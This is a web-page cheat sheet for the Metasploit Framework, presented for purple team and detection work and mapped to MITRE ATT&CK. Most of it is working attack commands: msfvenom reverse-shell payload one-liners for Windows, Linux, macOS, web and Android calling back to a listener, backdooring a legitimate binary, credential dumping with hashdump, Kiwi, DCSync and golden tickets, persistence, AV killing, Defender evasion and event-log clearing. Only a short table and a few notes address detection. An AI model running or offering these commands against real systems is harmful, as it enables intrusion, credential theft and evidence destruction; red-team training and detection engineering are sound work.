Views: 3
// Metasploit Framework Cheat Sheet
msfconsole, msfvenom payload generation, and Meterpreter post-exploitation reference for adversary simulation, purple team exercises, and detection engineering. Commands mapped to MITRE ATT&CK where applicable.
Metasploit 6.x
msfvenom / Meterpreter
MITRE ATT&CK Mapped
Console Basics
Workspace & DB
Search & Modules
Options & Sessions
msfvenom Syntax
Payload One-Liners
Formats & Encoders
Handler Setup
Meterpreter Core
Filesystem & Process
Network & Pivoting
Privesc & Creds
Persistence
Post Modules
Auxiliary Scanners
Evasion & OPSEC
Shortcuts
Engagement Workflow
msfconsole Basics
RUN
Launching & Global Commands
| Command | Description |
|---|---|
| msfconsole | Start the framework |
| msfconsole -q | Start quietly, no banner |
| msfconsole -r script.rc | Auto-run a resource script on start |
| help | List all commands |
| help <cmd> | Help for a specific command |
| banner | Random banner (harmless fun) |
| version | Framework version info |
| exit / quit | Leave msfconsole |
VAR
Global Variables & History
| Command | Description |
|---|---|
| setg RHOSTS 10.10.10.5 | Set a global var (persists across modules) |
| unsetg RHOSTS | Unset a global var |
| save | Save current datastore/config |
| history | Show console command history |
| makerc out.rc | Dump session history to resource script |
| irb | Drop to Ruby interactive shell |
| load <plugin> | Load a plugin (e.g. nessus, sqlmap) |
Use
setg for RHOSTS/LHOST/LPORT once per engagement to avoid re-typing them for every module.JOB
Jobs, Threads & Logging
| Command | Description |
|---|---|
| jobs | List background jobs |
| jobs -k <id> | Kill a job |
| jobs -K | Kill all jobs |
| spool /tmp/msf.log | Log console output to file |
| route add <net> <mask> <sid> | Route traffic through a session |
| sessions -l | List active sessions |
| sessions -i <id> | Interact with a session |
Workspace & Database
DB
Database & Workspace Management
Database Setup
db_statusCheck DB connectivity
db_connect msf:[email protected]/msfManual DB connect
db_nmap -sV -A 10.10.10.0/24Nmap scan, results stored in DB
db_import scan.xmlImport Nmap/Nessus/Nexpose results
db_export -f xml report.xmlExport workspace data
Workspaces
workspaceList workspaces
workspace -a silent_ledgerAdd and switch workspace
workspace silent_ledgerSwitch active workspace
workspace -d old_opDelete a workspace
DAT
Querying Stored Data
Hosts, Services, Vulns, Creds
hostsList discovered hosts
hosts -RSet RHOSTS from all hosts in workspace
services -p 445Filter services by port
vulnsList discovered vulnerabilities
credsList captured credentials
creds add user:admin pass:P@ss123Manually add a credential
lootList collected loot (dumps, files)
notesList analyst notes on hosts
Module Search & Selection
SRCH
Searching for Modules
search Syntax
search eternalblueKeyword search
search type:exploit platform:windows smbFiltered search
search cve:2021-34527Search by CVE
search rank:excellent name:apacheFilter by reliability rank
search date:2024 windows localRecent local privesc modules
Module Types
exploit/auxiliary/post/
payload/encoder/nop/evasion/
USE
Selecting & Inspecting Modules
Load a Module
use exploit/windows/smb/ms17_010_eternalblueLoad by full path
use 3Load by search result index
backUnload current module
Inspect Before Running
infoFull module details, references, targets
show optionsRequired/optional datastore options
show targetsValid exploit targets
show payloadsCompatible payloads for module
show advancedAdvanced tuning options
checkTest vulnerability without exploiting (safe)
Setting Options & Running
OPT
Configuring & Executing
Core Options
set RHOSTS 10.10.10.5Target host(s)
set RPORT 445Target port
set PAYLOAD windows/x64/meterpreter/reverse_tcpAttach a payload
set LHOST 10.10.10.200Listener/callback address
set LPORT 4444Listener port
set TARGET 0Explicit exploit target index
Run
exploitRun exploit (foreground)
exploit -j -zRun as background job, don’t interact
runAlias for exploit (also used for auxiliary/post)
SESS
Session Management
Working With Sessions
sessionsList all sessions
sessions -i 1Interact with session 1
sessions -u 1Upgrade shell to Meterpreter
sessions -k 1Kill session 1
sessions -KKill all sessions
sessions -C “sysinfo” -i 1Run one command on a session
background(Inside session) return to msfconsole, keep alive
Prefer
exploit -j -z for engagements with multiple simultaneous targets so sessions stack up in the background.msfvenom Syntax
VEN
Core Syntax & Flags T1027 T1204
| Flag | Description | Example |
|---|---|---|
| -p | Payload path | windows/x64/meterpreter/reverse_tcp |
| -a | Target architecture | x86 / x64 |
| –platform | Target platform | windows / linux / osx / android |
| -f | Output format | exe / elf / raw / psh / apk |
| -e | Encoder | x86/shikata_ga_nai |
| -i | Encode iterations | 3 |
| -b | Bad chars to avoid | ‘\x00\x0a\x0d’ |
| -x | Template executable | putty.exe (for injection) |
| -k | Keep template functionality | run alongside payload |
| -o | Output file | shell.exe |
| -n | NOP sled length (bytes) | 16 |
| –smallest | Minimize payload size |
HLP
Discovery Commands
msfvenom -l payloads # List all payloads
msfvenom -l encoders # List all encoders
msfvenom -l formats # List all output formats
msfvenom -l nops # List NOP generators
msfvenom -p windows/meterpreter/reverse_tcp –list-options # Payload-specific options
Staged payloads (e.g.
windows/meterpreter/reverse_tcp) are smaller but need a matching stager handler. Stageless (windows/meterpreter_reverse_tcp) are self-contained and more IDS/AV-detectable in size.Payload Generation One-Liners
WIN
Windows Payloads
EXE (staged Meterpreter)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f exe -o shell.exe
PowerShell (in-memory)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f psh-reflection -o shell.ps1
DLL (sideloading)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f dll -o shell.dll
HTA (phishing delivery)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f hta-psh -o shell.hta
MSI (installer-based)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f msi -o shell.msi
NIX
Linux / macOS Payloads
Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o shell.elf
Linux Shell (netcat-style)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o rshell.elf
macOS Mach-O
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f macho -o shell.macho
Bash one-liner (no binary)
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.200 LPORT=4444 -f raw
Python (cross-platform)
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.py
WEB
Web / Mobile Payloads
PHP Web Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.php
JSP (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.jsp
WAR (Tomcat manager deploy)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f war -o shell.war
Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -o shell.apk
ASPX (IIS deploy)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f aspx -o shell.aspx
Output Formats, Encoders & Template Injection
ENC
Encoding & Bad Character Avoidance
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 5 -b ‘\x00\x0a\x0d’ -f exe -o shell.exe
Modern AV/EDR signature-matches shikata_ga_nai easily; treat encoding as an obfuscation layer for lab exercises, not a bypass technique against production EDR.
Common Formats (-f)
exeelfmachodll
rawcpythonpsh
psh-reflectionhta-pshwaraspx
jarvbamsi
INJ
Template / Executable Injection T1027.002
Inject into a legitimate binary
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -x putty.exe -k -f exe -o putty_backdoored.exe
Combine with encoding + multiple iterations
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 3 -x app.exe -k -f exe -o app_bd.exe
The
-k flag keeps the original binary’s functionality running alongside the payload thread — useful for realistic phishing-lure simulation in a lab.Listener / Handler Setup
HDL
multi/handler T1071
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false # Keep listening after first catch
exploit -j -z # Background job, don’t auto-interact
Always start the handler before executing the payload on target. Match PAYLOAD, LHOST and LPORT exactly to what was used in msfvenom.
RC
Resource Scripts for Repeatable Handlers
handler.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false
exploit -j -z
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false
exploit -j -z
Launch with it
msfconsole -q -r handler.rc
Useful for consistent, version-controlled handler configs across repeated Operation Silent Ledger runs.
Meterpreter — Core Commands
COR
Situational Awareness
| Command | Description |
|---|---|
| sysinfo | OS, hostname, architecture |
| getuid | Current user context |
| getpid | Current process ID |
| ps | List running processes |
| getprivs | List enabled privileges |
| enumdesktops | List accessible desktops |
| idletime | User idle time (for opsec timing) |
| screenshot | Capture the active desktop |
| webcam_list / webcam_snap | Enumerate/capture webcam |
SES
Session & Shell Control
| Command | Description |
|---|---|
| background | Send session to background |
| shell | Drop to native OS shell |
| exit / quit | Terminate the Meterpreter session |
| irb | Ruby shell within session context |
| info | Session metadata |
| guid | Session GUID (for reconnect) |
| channel -l | List active I/O channels |
| sleep <secs> | Put session to sleep (evade idle scans) |
Meterpreter — Filesystem & Process
FS
Filesystem Operations T1005
Navigation
pwd / getwdPrint working directory
cd C:\\Users\\PublicChange directory
ls / dirList directory contents
lpwd / lcdLocal (attacker) working dir
Transfer
upload evil.exe C:\\Windows\\Temp\\Upload file to target
download C:\\Users\\admin\\creds.txt .Download file from target
edit config.txtEdit remote file with vim
cat notes.txtPrint file contents
rm evidence.logDelete a file (anti-forensics)
timestomp file.txt -vView/modify MACE timestamps T1070.006
PRC
Process Manipulation & Migration T1055
Process Control
psList processes (PID/PPID/arch/user)
migrate <PID>Move session into another process
kill <PID>Terminate a process
execute -f cmd.exe -i -HExecute + interact, hidden window
run post/windows/manage/migrateAuto-migrate to a stable process
Migrate into a long-lived, medium-integrity process (e.g.
explorer.exe) early — avoids losing the session if the spawning process (e.g. Office macro host) closes.Meterpreter — Network & Pivoting
NET
Network Enumeration
| Command | Description |
|---|---|
| ipconfig / ifconfig | Interface details of compromised host |
| arp | ARP cache — nearby hosts |
| netstat | Active connections (like OS netstat) |
| route | Routing table on target |
| getproxy | Proxy configuration in use |
| run post/windows/gather/enum_ad_computers | AD host enumeration |
PIV
Pivoting & Port Forwarding T1090
Route Traffic Through a Session
run autoroute -s 172.30.1.0/24Add pivot route via session
run autoroute -pPrint current routes
background then route add 172.30.1.0 255.255.255.0 1Manual route via session ID 1
Port Forwarding
portfwd add -l 3389 -p 3389 -r 172.30.1.10Local-to-remote forward (RDP)
portfwd listList active forwards
portfwd delete -l 3389Remove a forward
SOCKS Proxy
use auxiliary/server/socks_proxyStart SOCKS4a/5 proxy module
set SRVPORT 1080; runThen chain via proxychains
Privilege Escalation & Credential Access
ESC
Privilege Escalation T1068
Automated Escalation
getsystemTry all built-in SYSTEM techniques
getsystem -t 1Named pipe impersonation (technique 1)
run post/multi/recon/local_exploit_suggesterSuggest local privesc exploits
use exploit/windows/local/bypassuacUAC bypass module
Token Manipulation T1134
load incognitoLoad token impersonation extension
list_tokens -uList available tokens by user
impersonate_token “NORTHBRIDGE\\admin”Impersonate a captured token
rev2selfRevert to original token
CRD
Credential Access T1003
Hashdump & Mimikatz/Kiwi
hashdumpDump local SAM hashes
load kiwiLoad mimikatz-based extension
creds_allDump all available credential types
lsa_dump_samSAM database via LSA
lsa_dump_secretsLSA secrets (service account creds)
dcsync_ntlm NORTHBRIDGE\\krbtgtDCSync a specific account T1003.006
Golden/Silver Ticket T1558.001
golden_ticket_create -u admin -d northbridge.local -k <krbtgt-hash> -s <SID> -t ticket.tckForge a Golden Ticket
kerberos_ticket_use ticket.tckLoad ticket into session
kerberos_ticket_listList cached tickets
Persistence
PER
Persistence Mechanisms T1547 T1053.005
Post Modules
run post/windows/manage/persistence_exeInstall EXE persistence (registry run key/service)
run persistence -X -i 30 -p 4444 -r 10.10.10.200Legacy persistence script (autoruns at boot)
use exploit/windows/local/registry_persistenceRegistry-based persistence module
Scheduled Task / Service
shell -c “schtasks /create /tn upd /tr C:\\…\\shell.exe /sc onlogon”Scheduled task persistence
run post/windows/manage/persistence_serviceInstall as a Windows service
Track every persistence artifact you drop (registry keys, task names, service names, file paths) so cleanup and blue-team detection validation stay accurate for the exercise report.
CLN
Cleanup / Anti-Forensics T1070
| Command | Description |
|---|---|
| clearev | Clear Windows event logs (Security/System/App) |
| run event_manager -c | Clear specific event logs |
| timestomp <file> -z “MM/DD/YYYY HH:MM:SS” | Set arbitrary timestamp |
| rm <path> | Remove dropped tooling |
In a lab, clearing logs deliberately breaks detection validation — only use these to test whether your monitoring stack (Wazuh/Sysmon/Splunk) actually alerts on
4-clearlogfile event ID 1102.Post-Exploitation Modules
GTH
Gather / Recon Post Modules T1082
post/windows/gather/checkvmDetect virtualization (evasion check)
post/windows/gather/enum_logged_on_usersCurrently/recently logged on users
post/windows/gather/enum_sharesEnumerate SMB shares
post/windows/gather/credentials/credential_collectorAggregate all crackable creds
post/windows/gather/enum_domainIdentify the AD domain
post/multi/gather/envDump environment variables
post/linux/gather/enum_configsLinux config/service enumeration
MGT
Manage / Escalate Post Modules
post/multi/manage/shell_to_meterpreterUpgrade plain shell to Meterpreter
post/windows/manage/migrateAutomated stable migration
post/windows/manage/enable_rdpEnable RDP on target
post/windows/manage/killavAttempt to kill known AV processes
post/multi/recon/local_exploit_suggesterSuggest applicable local exploits
post/windows/gather/smart_hashdumpHashdump across domain-cached creds
Run post modules with
run <module> from an active Meterpreter session, or use + set SESSION <id> from msfconsole.Auxiliary Scanners & Recon
SCN
Service Scanners T1046
auxiliary/scanner/portscan/tcpBasic TCP port scan
auxiliary/scanner/smb/smb_versionIdentify SMB version/OS
auxiliary/scanner/ssh/ssh_versionSSH banner grab
auxiliary/scanner/http/http_versionHTTP server fingerprint
auxiliary/scanner/rdp/rdp_scannerRDP availability/version
AUT
Auth / Spray Modules T1110
auxiliary/scanner/smb/smb_loginSMB credential validation
auxiliary/scanner/ssh/ssh_loginSSH bruteforce/validation
auxiliary/scanner/winrm/winrm_loginWinRM credential check
auxiliary/gather/kerberos_enumusersAS-REP username enum
set BLANK_PASSWORDS falseCommon spray tuning option
EXP
Exploitation Aux
auxiliary/admin/smb/ms17_010_commandEternalBlue command exec
auxiliary/scanner/smb/smb_ms17_010EternalBlue vuln check
auxiliary/dos/…DoS modules — lab only, never live
auxiliary/spoof/nbns/nbns_responseNBNS spoofing (relay setup)
Evasion & Detection-Awareness Notes
EVA
Evasion Module & Considerations T1027
Framework Evasion Module Type
use evasion/windows/windows_defender_exeBuilt-in Defender-evasion generator
set LHOST/LPORT then generateProduces evasive binary output
Default Meterpreter reverse_tcp is heavily signatured by every modern EDR. In purple team exercises the value is in measuring detection coverage, not defeating controls — treat evasion as a way to generate detection gaps to fix, not a production bypass goal.
SIG
Common Detection Surfaces
| Artifact | Where it shows up |
|---|---|
| Named pipe | \\.\pipe\msagent_xx — Sysmon Event 17/18 |
| Process migration | Sysmon Event 8 (CreateRemoteThread) |
| getsystem | Named pipe impersonation — Event 1/17/18 |
| hashdump | LSASS access — Sysmon Event 10, EDR alert |
| PSExec-style exec | Service creation — Event 7045/4697 |
| clearev | Event ID 1102 (log cleared) — very high fidelity |
Console Shortcuts & Tips
KEY
msfconsole Keybindings
TabAutocomplete module/command/option
Ctrl + CInterrupt current command
Ctrl + ZBackground current session
↑ / ↓Cycle command history
Ctrl + RReverse search history
?Alias for help
TIP
Practical Tips
unset allClear all set datastore options
reload_allReload all modules (after custom module edit)
editOpen current module’s source in $EDITOR
reloadReload the current module after edits
color falseDisable ANSI color (for logging/CI)
Engagement Workflow (Purple Team Lab)
WF
End-to-End Kill Chain Checklist
1
Workspace & DB Setup
workspace -a silent_ledger — keep hosts/creds/loot scoped per campaign
2
Recon & Scanning
db_nmap -sV -A target-range — feeds hosts/services tables automatically
3
Payload Generation
msfvenom -p … -f exe -o payload.exe — track hash/filename for detection scoring
4
Handler + Delivery
exploit/multi/handler backgrounded, then deliver payload via chosen initial access vector
5
Stabilize Session
migrate to a stable process, getprivs, sysinfo — confirm foothold
6
Privesc & Credential Access
getsystem, load kiwi, hashdump — map each action to a TTP for scoring
7
Lateral Movement
psexec/wmiexec modules or pass-the-hash into Server Zone hosts
8
Domain Compromise
dcsync_ntlm krbtgt, golden_ticket_create — full domain persistence
9
Cross-Reference Detections
Check Wazuh/Elastic/Splunk for each TTP fired — log gaps in the purple team tracker
10
Cleanup & Report
sessions -K, remove dropped tooling, document IOCs and detection coverage per ATT&CK ID

